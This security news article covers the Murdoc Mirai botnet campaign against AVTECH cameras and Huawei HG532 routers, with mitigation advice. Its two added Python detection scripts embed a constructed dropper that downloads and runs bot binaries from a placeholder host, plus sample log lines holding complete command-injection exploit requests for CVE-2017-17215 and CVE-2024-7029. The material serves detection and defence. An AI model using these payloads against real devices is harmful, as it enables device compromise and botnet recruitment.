Cybersecurity researchers have warned of a large-scale campaign that exploits security flaws in AVTECH IP cameras and Huawei HG532 routers to enlist the devices in a Mirai botnet variant dubbed Murdoc Botnet. According to Qualys security researcher Shilpesh Trivedi, the ongoing activity demonstrates enhanced capabilities, exploiting vulnerabilities to compromise devices and build out large botnet networks.
Campaign Overview
The Murdoc Botnet campaign has been active since at least July 2024, with over 1,370 systems infected so far, most of them in Malaysia, Mexico, Thailand, Indonesia, and Vietnam. The attackers gain initial access through known vulnerabilities, including CVE-2017-17215 (a command-injection flaw in the Huawei HG532 router) and CVE-2024-7029 (a command-injection flaw in AVTECH IP cameras). Once in, they run a shell script that downloads the bot binary built for the device's CPU architecture from an attacker-controlled server and executes it; as in other Mirai-family loaders, the script tries several architecture-specific builds in turn so that one dropper works across the mixed ARM and MIPS hardware found in IoT devices.
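The loader stage described above, as an added example that is not part of the original article or the Qualys report: a Python script that takes a Mirai-style multi-architecture dropper and pulls out the indicators a defender would block or hunt for (download hosts and URLs, the CPU architectures the loader targets, the fetch tools it relies on, and the writable directories it stages in). The dropper text is constructed to mimic the pattern; the host 198.51.100.7 and the file names are placeholders, not indicators from the campaign.

```python
"""Pull blocking indicators out of a Mirai-style multi-architecture dropper.

Added example, not code from the Qualys report or from the Murdoc Botnet.
The dropper text is constructed to mimic the loader pattern the article
describes; the host 198.51.100.7 and the file names are placeholders.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: one loop fetches a build per CPU architecture and runs it,
# so whichever binary matches the device's CPU survives the others failing.
SAMPLE_DROPPER = r"""#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
for arch in arm arm5 arm6 arm7 mips mipsel x86 x86_64 sh4 powerpc; do
  wget http://198.51.100.7/bins/bot.$arch -O x; chmod +x x; ./x avtech; rm -f x
done
curl -s http://198.51.100.7/bins/bot.mips -o /tmp/.m && chmod 777 /tmp/.m && /tmp/.m huawei
"""

# Architecture suffixes commonly seen on Mirai-family binaries.
ARCH_TOKENS = {"arm", "arm5", "arm6", "arm7", "mips", "mipsel", "x86", "x86_64",
               "sh4", "powerpc", "m68k", "spc", "i586", "i686", "sparc"}
FETCH_TOOLS = ("wget", "curl", "tftp", "ftpget")
STAGING_DIRS = ("/tmp", "/var/run", "/var/tmp", "/dev/shm", "/mnt")
URL_RE = re.compile(r"(?:https?|tftp|ftp)://[^\s'\";|&]+")


@dataclass
class DropperIOCs:
    hosts: set = field(default_factory=set)
    urls: set = field(default_factory=set)
    architectures: set = field(default_factory=set)
    fetch_tools: set = field(default_factory=set)
    staging_dirs: set = field(default_factory=set)


def analyze_dropper(script: str) -> DropperIOCs:
    """Extract hosts, URLs, target architectures, fetch tools and staging dirs."""
    iocs = DropperIOCs()
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for url in URL_RE.findall(line):
            iocs.urls.add(url)
            iocs.hosts.add(re.sub(r"^\w+://", "", url).split("/")[0])
            # A literal architecture suffix on the fetched file name (bot.mips).
            suffix = url.rsplit("/", 1)[-1].rsplit(".", 1)[-1]
            if suffix in ARCH_TOKENS:
                iocs.architectures.add(suffix)
        # A shell loop over architecture names: for arch in arm mips ...; do
        loop = re.match(r"for\s+\w+\s+in\s+(.+)", line)
        if loop:
            for tok in loop.group(1).replace(";", " ").split():
                if tok in ARCH_TOKENS:
                    iocs.architectures.add(tok)
        for tool in FETCH_TOOLS:
            if re.search(rf"\b{tool}\b", line):
                iocs.fetch_tools.add(tool)
        for d in STAGING_DIRS:
            # Match /tmp but not /var/tmp, and /tmp/.m but not /tmpfoo.
            if re.search(rf"(?<![\w/]){re.escape(d)}(?![\w])", line):
                iocs.staging_dirs.add(d)
    return iocs


def looks_like_multiarch_dropper(iocs: DropperIOCs) -> bool:
    """Heuristic: a fetch tool pulling builds for two or more CPU architectures
    into a world-writable directory is the Mirai loader signature."""
    return (len(iocs.architectures) >= 2 and bool(iocs.fetch_tools)
            and bool(iocs.staging_dirs))


if __name__ == "__main__":
    result = analyze_dropper(SAMPLE_DROPPER)
    print("block these hosts:", sorted(result.hosts))
    print("architectures targeted:", sorted(result.architectures))
    print("multi-arch dropper:", looks_like_multiarch_dropper(result))
```

Run against the constructed sample it reports one host to block, ten targeted architectures and three staging directories; fed a real dropper recovered from a camera's /tmp it yields the same fields for that sample, which is what you would push to a blocklist or a hunt query.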
The primary objective of these attacks is to weaponize the botnet for distributed denial-of-service (DDoS) attacks, which can cripple targeted networks and systems.
Exposure and Impact
A search on the Censys exposure management platform found more than 37,995 AVTECH cameras exposed to the internet, predominantly in Taiwan, Vietnam, Indonesia, the United States, and Sri Lanka. Any camera reachable from the internet and still running vulnerable firmware is a candidate for recruitment by this campaign.
The Murdoc Botnet campaign follows a series of similar incidents involving Mirai botnet variants. For instance:
- gayfemboy Botnet: A Mirai variant that has exploited a newly disclosed vulnerability in Four-Faith industrial routers since early November 2024.
- CVE-2024-7029 Exploitation: Malicious actors enlisted AVTECH devices into a botnet in mid-2024.
- DDoS attacks in Japan: Major Japanese corporations and banks faced large-scale DDoS attacks from an IoT botnet at the end of 2024. Its targets also included organizations in the U.S., Bahrain, Poland, Spain, Israel, and Russia.
Botnet Operations
The botnet behind those attacks on Japan primarily targets telecommunications, technology, hosting, cloud computing, banking, gaming, and financial services. Over 55% of its compromised devices are located in India, followed by South Africa, Brazil, Bangladesh, and Kenya; these figures describe that botnet, not the 1,370 Murdoc infections noted above.
That botnet comprises malware variants derived from Mirai and BASHLITE and supports multiple DDoS attack methods, self-update, and proxying traffic through the infected device. Its infection chain follows the usual Mirai pattern: exploit an IoT device, drop a loader that fetches the main payload, then connect to a command-and-control (C2) server for instructions.
Recommendations for Protection
To mitigate the risks posed by the Murdoc Botnet and similar campaigns, cybersecurity experts recommend the following measures:
- Monitor Activity: Regularly monitor for suspicious processes, events, and network traffic generated by untrusted binaries or scripts.
- Apply Firmware Updates: Ensure all IoT devices run the latest firmware versions to patch known vulnerabilities; where the vendor no longer ships fixes, take the device off the internet or replace it.
- Secure Credentials: Change default usernames and passwords to strong, unique combinations.
- Network Segmentation: Isolate IoT devices from critical infrastructure to limit lateral movement in the event of compromise.
- Deploy Security Solutions: Utilize intrusion detection and prevention systems to identify and block malicious activity.
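The monitoring and detection items above, as an added example that is not part of the original article, the Qualys report or any vendor's product: a Python script that runs over web request logs collected in front of the cameras and routers (a reverse proxy, honeypot or IDS export) and flags attempts against the two CVEs the article names, plus the device-agnostic fetch-and-run stage that follows a successful injection. The log lines are constructed (RFC 5737 addresses, JSON-lines format chosen for the example); the request shapes follow the public write-ups of CVE-2017-17215 (Huawei HG532 UPnP DeviceUpgrade_1 SOAP request carrying shell syntax in NewStatusURL or NewDownloadURL) and CVE-2024-7029 (AVTECH Factory.cgi brightness parameter), which the article itself does not spell out, so check them against the vendor advisories before deploying.

```python
"""Flag exploit attempts for the two CVEs named in the article, plus the
follow-on fetch-and-run stage, in web request logs.

Added example, not code from the Qualys report or any vendor. The log lines
are constructed (RFC 5737 addresses); the request shapes follow the public
write-ups of CVE-2017-17215 (Huawei HG532 UPnP DeviceUpgrade_1 SOAP request
with shell syntax in NewStatusURL/NewDownloadURL) and CVE-2024-7029 (AVTECH
Factory.cgi brightness parameter), which the article itself does not give.
"""
import json
import re
from urllib.parse import parse_qsl, urlsplit

# Shell syntax that has no business inside a URL or a brightness value.
SHELL_INJECTION = re.compile(r"\$\(|`|;|\||&&")
# Stage-two behaviour: the injected command fetches a payload to run.
FETCH_TOOL = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")

# Constructed JSON-lines log: one request per line, body included for POSTs.
SAMPLE_LOG = r"""
{"ts":"2025-01-20T03:14:07Z","src":"203.0.113.9","method":"POST","path":"/ctrlt/DeviceUpgrade_1","body":"<?xml version='1.0'?><s:Envelope><s:Body><u:Upgrade xmlns:u='urn:schemas-upnp-org:service:WANPPPConnection:1'><NewStatusURL>$(/bin/busybox wget -g 203.0.113.9 -l /tmp/.x -r /bins/mips; chmod +x /tmp/.x; /tmp/.x)</NewStatusURL><NewDownloadURL>HUAWEIUPNP</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>"}
{"ts":"2025-01-20T03:14:09Z","src":"203.0.113.9","method":"GET","path":"/cgi-bin/supervisor/Factory.cgi?action=brightness&brightness=%24%28wget+http%3A%2F%2F203.0.113.9%2Fbins%2Farm7+-O+%2Ftmp%2Fa%3Bchmod+777+%2Ftmp%2Fa%3B%2Ftmp%2Fa%29","body":""}
{"ts":"2025-01-20T03:15:00Z","src":"192.0.2.44","method":"GET","path":"/cgi-bin/supervisor/Factory.cgi?action=brightness&brightness=50","body":""}
{"ts":"2025-01-20T03:15:02Z","src":"192.0.2.45","method":"GET","path":"/index.html","body":""}
{"ts":"2025-01-20T03:16:30Z","src":"192.0.2.46","method":"POST","path":"/ctrlt/DeviceUpgrade_1","body":"<s:Envelope><s:Body><u:Upgrade><NewStatusURL>http://fw.example/status</NewStatusURL><NewDownloadURL>http://fw.example/hg532.bin</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>"}
"""


def classify_request(method: str, path: str, body: str = "") -> list[str]:
    """Return the detection tags that apply to one request (empty if benign)."""
    tags = []
    url = urlsplit(path)
    params = parse_qsl(url.query, keep_blank_values=True)  # percent-decoded
    values = [v for _, v in params]

    # CVE-2017-17215: Huawei HG532 UPnP "Upgrade" action; the status/download
    # URL reaches a shell, so shell syntax inside either element is the exploit.
    if method == "POST" and url.path == "/ctrlt/DeviceUpgrade_1":
        urls = re.findall(r"<New(?:Status|Download)URL>(.*?)</New", body, re.S)
        if any(SHELL_INJECTION.search(u) for u in urls):
            tags.append("CVE-2017-17215")

    # CVE-2024-7029: AVTECH Factory.cgi brightness handling is command-injectable.
    if url.path.endswith("/cgi-bin/supervisor/Factory.cgi"):
        touches_brightness = any("brightness" in (k, v) for k, v in params)
        if touches_brightness and any(SHELL_INJECTION.search(v) for v in values):
            tags.append("CVE-2024-7029")

    # Device-agnostic: an injected shell command that fetches a second stage.
    haystack = " ".join([url.path, *values, body])
    if FETCH_TOOL.search(haystack) and SHELL_INJECTION.search(haystack):
        tags.append("dropper-fetch")
    return tags


def scan_log(text: str) -> list[dict]:
    """Run classify_request over JSON-lines log text; return only the hits."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        tags = classify_request(ev["method"], ev["path"], ev.get("body", ""))
        if tags:
            alerts.append({"ts": ev["ts"], "src": ev["src"], "tags": tags})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ts"], alert["src"], ",".join(alert["tags"]))
```

On the constructed log the two requests from 203.0.113.9 are flagged with their CVE and the dropper-fetch tag, while the legitimate brightness call and the clean firmware-upgrade SOAP request from 192.0.2.46 pass untouched; the CVE rules are deliberately narrow, and the dropper-fetch rule is the one to keep watching, since it catches the same fetch-and-run stage whichever new flaw the next variant uses to get in.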
Conclusion
The Murdoc Botnet campaign underscores the persistent threat posed by IoT vulnerabilities. With attackers continuously evolving their tactics, organizations and individuals must remain vigilant, adopting robust security practices to safeguard their devices and networks. Failure to do so could result in severe disruptions, particularly for industries reliant on IoT technology.